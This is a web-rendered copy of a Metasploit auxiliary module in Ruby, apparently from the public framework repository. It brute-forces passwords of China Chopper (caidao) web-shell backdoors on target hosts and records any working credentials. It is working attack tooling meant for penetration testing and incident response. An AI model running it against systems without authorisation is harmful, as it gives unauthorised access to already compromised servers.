Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/credential_collection'

7
require 'metasploit/framework/login_scanner/caidao'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::Scanner

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::AuthBrute

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Chinese Caidao Backdoor Bruteforce',

20
        'Description' => 'This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.',

21
        'Author' => [ 'Nixawk' ],

22
        'References' => [

23
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],

24
          ['URL', 'https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii'],

25
          ['URL', 'http://web.archive.org/web/20170214000632/https://www.exploit-db.com/docs/27654.pdf'],

26
          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-314A'],

27
          ['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']

28
        ],

29
        'License' => MSF_LICENSE,

30
        'Notes' => {

31
          'Reliability' => UNKNOWN_RELIABILITY,

32
          'Stability' => UNKNOWN_STABILITY,

33
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

34
        }

35
      )

36
    )

37


38
    register_options(

39
      [

40
        OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),

41
        OptPath.new('PASS_FILE', [

42
          false,

43
          'The file that contains a list of of probable passwords.',

44
          File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')

45
        ])

46
      ]

47
    )

48


49
    # caidao does not have an username, there's only password

50
    deregister_options('HttpUsername', 'HttpPassword', 'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS')

51
  end

52


53
  def scanner(ip)

54
    @scanner ||= lambda {

55
      cred_collection = build_credential_collection(

56
        # The LoginScanner API refuses to run if there's no username, so we give it a fake one.

57
        # But we will not be reporting this to the database.

58
        username: 'caidao',

59
        password: datastore['PASSWORD']

60
      )

61


62
      return Metasploit::Framework::LoginScanner::Caidao.new(

63
        configure_http_login_scanner(

64
          host: ip,

65
          port: datastore['RPORT'],

66
          uri: datastore['TARGETURI'],

67
          cred_details: cred_collection,

68
          stop_on_success: datastore['STOP_ON_SUCCESS'],

69
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

70
          connection_timeout: 5,

71
          http_username: datastore['HttpUsername'],

72
          http_password: datastore['HttpPassword']

73
        )

74
      )

75
    }.call

76
  end

77


78
  def report_good_cred(ip, port, result)

79
    service_data = {

80
      address: ip,

81
      port: port,

82
      service_name: 'http',

83
      protocol: 'tcp',

84
      workspace_id: myworkspace_id

85
    }

86


87
    credential_data = {

88
      module_fullname: self.fullname,

89
      origin_type: :service,

90
      private_data: result.credential.private,

91
      private_type: :password,

92
    }.merge(service_data)

93


94
    login_data = {

95
      core: create_credential(credential_data),

96
      last_attempted_at: DateTime.now,

97
      status: result.status,

98
      proof: result.proof

99
    }.merge(service_data)

100


101
    create_credential_login(login_data)

102
  end

103


104
  def report_bad_cred(ip, rport, result)

105
    invalidate_login(

106
      address: ip,

107
      port: rport,

108
      protocol: 'tcp',

109
      private: result.credential.private,

110
      realm_key: result.credential.realm_key,

111
      realm_value: result.credential.realm,

112
      status: result.status,

113
      proof: result.proof

114
    )

115
  end

116


117
  # Attempts to login

118
  def bruteforce(ip)

119
    scanner(ip).scan! do |result|

120
      case result.status

121
      when Metasploit::Model::Login::Status::SUCCESSFUL

122
        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential.private}'")

123
        report_good_cred(ip, rport, result)

124
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

125
        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)

126
        report_bad_cred(ip, rport, result)

127
      when Metasploit::Model::Login::Status::INCORRECT

128
        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential.private}'")

129
        report_bad_cred(ip, rport, result)

130
      end

131
    end

132
  end

133


134
  def run_host(ip)

135
    unless scanner(ip).check_setup

136
      print_brute(:level => :error, :ip => ip, :msg => 'Backdoor type is not support')

137
      return

138
    end

139


140
    bruteforce(ip)

141
  end

142
end

143


144